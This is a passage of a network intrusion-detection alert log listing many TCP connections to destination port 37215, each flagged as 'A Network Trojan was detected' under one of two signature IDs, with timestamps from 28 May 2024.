                  Source Port:60720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845717
                  SID:2835222
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316583
                  SID:2829579
                  Source Port:51834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742672
                  SID:2829579
                  Source Port:57590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277325
                  SID:2829579
                  Source Port:38878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530479
                  SID:2829579
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846420
                  SID:2829579
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658972
                  SID:2829579
                  Source Port:34732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886188
                  SID:2835222
                  Source Port:54078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886587
                  SID:2835222
                  Source Port:56196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.290847
                  SID:2829579
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279348
                  SID:2829579
                  Source Port:36380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537163
                  SID:2829579
                  Source Port:35830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296279
                  SID:2829579
                  Source Port:45362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545450
                  SID:2829579
                  Source Port:42638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300121
                  SID:2829579
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316232
                  SID:2829579
                  Source Port:35782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694989
                  SID:2835222
                  Source Port:43962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576973
                  SID:2829579
                  Source Port:50802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737815
                  SID:2829579
                  Source Port:54420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536732
                  SID:2835222
                  Source Port:55818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790731
                  SID:2835222
                  Source Port:42350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887287
                  SID:2835222
                  Source Port:60790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591288
                  SID:2835222
                  Source Port:39776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661565
                  SID:2829579
                  Source Port:39146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888387
                  SID:2835222
                  Source Port:35784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870837
                  SID:2835222
                  Source Port:38810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911624
                  SID:2829579
                  Source Port:41182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659974
                  SID:2835222
                  Source Port:51002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585527
                  SID:2835222
                  Source Port:44104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283850
                  SID:2835222
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880109
                  SID:2835222
                  Source Port:58362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780999
                  SID:2829579
                  Source Port:42792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276560
                  SID:2829579
                  Source Port:56734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494685
                  SID:2835222
                  Source Port:33410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.930654
                  SID:2829579
                  Source Port:43352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.662004
                  SID:2829579
                  Source Port:45440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874528
                  SID:2829579
                  Source Port:58844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766979
                  SID:2835222
                  Source Port:48084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316759
                  SID:2829579
                  Source Port:51710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766486
                  SID:2829579
                  Source Port:56084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489236
                  SID:2835222
                  Source Port:51068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651402
                  SID:2829579
                  Source Port:55478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278043
                  SID:2835222
                  Source Port:48374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880044
                  SID:2829579
                  Source Port:44654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544251
                  SID:2829579
                  Source Port:55686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542764
                  SID:2835222
                  Source Port:49450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886235
                  SID:2829579
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795622
                  SID:2829579
                  Source Port:42590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277634
                  SID:2835222
                  Source Port:43798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886260
                  SID:2835222
                  Source Port:55852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695690
                  SID:2829579
                  Source Port:35378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579330
                  SID:2835222
                  Source Port:42208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527512
                  SID:2829579
                  Source Port:60820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606719
                  SID:2829579
                  Source Port:36198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629152
                  SID:2829579
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821114
                  SID:2829579
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578625
                  SID:2829579
                  Source Port:47772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537272
                  SID:2835222
                  Source Port:37686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801101
                  SID:2835222
                  Source Port:33932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300909
                  SID:2835222
                  Source Port:45958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550555
                  SID:2835222
                  Source Port:36832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588440
                  SID:2829579
                  Source Port:53538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278415
                  SID:2829579
                  Source Port:42126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781217
                  SID:2829579
                  Source Port:39070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649809
                  SID:2829579
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530023
                  SID:2829579
                  Source Port:41098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912093
                  SID:2835222
                  Source Port:56942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695747
                  SID:2835222
                  Source Port:40508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604594
                  SID:2829579
                  Source Port:44086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793479
                  SID:2829579
                  Source Port:58182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492083
                  SID:2829579
                  Source Port:38472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489869
                  SID:2829579
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790358
                  SID:2835222
                  Source Port:33446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860084
                  SID:2835222
                  Source Port:51516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904679
                  SID:2835222
                  Source Port:38482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278724
                  SID:2829579
                  Source Port:54368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649874
                  SID:2835222
                  Source Port:42596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796741
                  SID:2829579
                  Source Port:39586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586989
                  SID:2835222
                  Source Port:60044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651787
                  SID:2829579
                  Source Port:52884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622241
                  SID:2829579
                  Source Port:57604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536240
                  SID:2835222
                  Source Port:41966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868540
                  SID:2835222
                  Source Port:55638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810449
                  SID:2835222
                  Source Port:36302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319100
                  SID:2835222
                  Source Port:41724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719228
                  SID:2829579
                  Source Port:48814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768412
                  SID:2835222
                  Source Port:39858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769373
                  SID:2835222
                  Source Port:45146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627977
                  SID:2829579
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719861
                  SID:2829579
                  Source Port:49220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496430
                  SID:2829579
                  Source Port:48342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579211
                  SID:2835222
                  Source Port:37362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920865
                  SID:2829579
                  Source Port:48882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316343
                  SID:2829579
                  Source Port:60018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530873
                  SID:2835222
                  Source Port:36652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920703
                  SID:2835222
                  Source Port:32788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488760
                  SID:2835222
                  Source Port:33692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489338
                  SID:2829579
                  Source Port:56580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755665
                  SID:2835222
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718833
                  SID:2835222
                  Source Port:60304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494891
                  SID:2829579
                  Source Port:50768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930146
                  SID:2829579
                  Source Port:55720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488783
                  SID:2835222
                  Source Port:60216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652038
                  SID:2829579
                  Source Port:40948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593090
                  SID:2835222
                  Source Port:47306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664827
                  SID:2835222
                  Source Port:52452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278732
                  SID:2829579
                  Source Port:34224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870627
                  SID:2829579
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920132
                  SID:2829579
                  Source Port:57800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781027
                  SID:2829579
                  Source Port:35992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788049
                  SID:2829579
                  Source Port:41564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846728
                  SID:2829579
                  Source Port:45264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492349
                  SID:2829579
                  Source Port:40698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577242
                  SID:2829579
                  Source Port:59126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704293
                  SID:2829579
                  Source Port:56776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528182
                  SID:2835222
                  Source Port:57396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549507
                  SID:2835222
                  Source Port:41838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661259
                  SID:2835222
                  Source Port:50482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292594
                  SID:2829579
                  Source Port:49858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583471
                  SID:2829579
                  Source Port:41352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517564
                  SID:2835222
                  Source Port:56538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713743
                  SID:2829579
                  Source Port:39968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908034
                  SID:2829579
                  Source Port:45796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790529
                  SID:2829579
                  Source Port:52924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655791
                  SID:2829579
                  Source Port:33716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847544
                  SID:2829579
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695414
                  SID:2835222
                  Source Port:51980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316299
                  SID:2829579
                  Source Port:43060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660513
                  SID:2829579
                  Source Port:55202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665509
                  SID:2829579
                  Source Port:47082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.743042
                  SID:2829579
                  Source Port:58866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546663
                  SID:2835222
                  Source Port:52418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886805
                  SID:2835222
                  Source Port:40348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292767
                  SID:2829579
                  Source Port:51088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775941
                  SID:2829579
                  Source Port:55646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.928412
                  SID:2829579
                  Source Port:60980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930337
                  SID:2835222
                  Source Port:53208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742674
                  SID:2829579
                  Source Port:41054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628530
                  SID:2835222
                  Source Port:55600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912552
                  SID:2835222
                  Source Port:52192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702267
                  SID:2835222
                  Source Port:52658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.793452
                  SID:2829579
                  Source Port:35086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911215
                  SID:2835222
                  Source Port:38212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.546737
                  SID:2835222
                  Source Port:53848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911213
                  SID:2829579
                  Source Port:49976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767844
                  SID:2829579
                  Source Port:36808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790537
                  SID:2835222
                  Source Port:42172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689596
                  SID:2829579
                  Source Port:47024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911586
                  SID:2835222
                  Source Port:57584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788875
                  SID:2835222
                  Source Port:56332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900396
                  SID:2835222
                  Source Port:53240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720259
                  SID:2829579
                  Source Port:60288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737853
                  SID:2829579
                  Source Port:38220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298970
                  SID:2829579
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.603995
                  SID:2829579
                  Source Port:42904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886513
                  SID:2835222
                  Source Port:38790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729721
                  SID:2835222
                  Source Port:48140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795798
                  SID:2829579
                  Source Port:33282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584676
                  SID:2835222
                  Source Port:55858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790509
                  SID:2835222
                  Source Port:42264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912231
                  SID:2835222
                  Source Port:34930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489338
                  SID:2829579
                  Source Port:60906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906732
                  SID:2835222
                  Source Port:41786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785691
                  SID:2829579
                  Source Port:49990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490277
                  SID:2829579
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790716
                  SID:2835222
                  Source Port:60128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720243
                  SID:2829579
                  Source Port:53372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.924496
                  SID:2835222
                  Source Port:53608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293763
                  SID:2829579
                  Source Port:50004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696385
                  SID:2835222
                  Source Port:35286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491385
                  SID:2835222
                  Source Port:59710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528981
                  SID:2829579
                  Source Port:37874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907374
                  SID:2835222
                  Source Port:34738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661534
                  SID:2829579
                  Source Port:47024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846044
                  SID:2829579
                  Source Port:41118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694954
                  SID:2829579
                  Source Port:38672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.644133
                  SID:2829579
                  Source Port:54980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849237
                  SID:2829579
                  Source Port:46170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488228
                  SID:2829579
                  Source Port:41346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908590
                  SID:2835222
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294539
                  SID:2829579
                  Source Port:49648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319934
                  SID:2829579
                  Source Port:33510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661020
